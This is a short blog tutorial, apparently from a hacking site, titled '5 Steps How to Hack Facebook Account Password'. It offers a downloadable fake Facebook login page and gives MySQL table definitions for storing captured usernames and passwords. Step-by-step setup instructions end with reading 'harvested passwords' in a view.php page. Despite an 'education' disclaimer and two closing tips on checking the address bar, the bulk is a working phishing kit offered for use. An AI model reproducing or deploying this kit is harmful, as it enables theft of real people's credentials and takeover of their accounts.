5 Steps How to Hack Facebook Account Password is the tutorial I made to continue the other how to hack a facebook account tutorial from Hacking-tutorial.com.
On How to Hack Facebook phishing attack page (see here) there is a comment from jordin71 that asking for the new facebook offline page, because the last tutorial is the old facebook interface. So we decide to make the new one to update the facebook offline file.
We also want to remind you again that this tutorial How to Hack Facebook Account and the downloadable file is free to use and the purpose is for education. we're not responsible for any misuse of this file.
1. Facebook offline page (download)
2. MySQL Table Query (the MySQL table for this tutorial)
-- -- Table structure for table `fb_fail` -- CREATE TABLE IF NOT EXISTS `fb_fail` ( `id` int(10) NOT NULL AUTO_INCREMENT, `uname` varchar(255) NOT NULL, `pwd` varchar(255) NOT NULL, `date` datetime NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ; -- -------------------------------------------------------- -- -- Table structure for table `fb_login` -- CREATE TABLE IF NOT EXISTS `fb_login` ( `id` int(10) NOT NULL AUTO_INCREMENT, `uname` varchar(255) NOT NULL, `pwd` varchar(255) NOT NULL, `date` datetime NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=2 ; -- -- Dumping data for table `fb_login` --
1. Download the facebook offline file from the link above
2. Inside the facebook.rar file there are 3 files (index.php, login.php, and view.php) you need to configure 2 of them (login.php and view.php) to match with your database server configuration.
3. In this third step, you can view my previous tutorial about how to hack facebook account using phishing method (see the tutorial here)
4. This is the fake facebook page interface preview screenshot using my browser.
5. If someone logged in, we can view the harvested passwords in view.php page.
1. See carefully the browser address bar URL, do not continue to browse if you find the URI is mistyping, only facebook.com the real one.
2. If you type your username and password correctly, but the facebook page redirect you to wrong username or password error page, see the browser address bar URL in case you open the fake facebook page.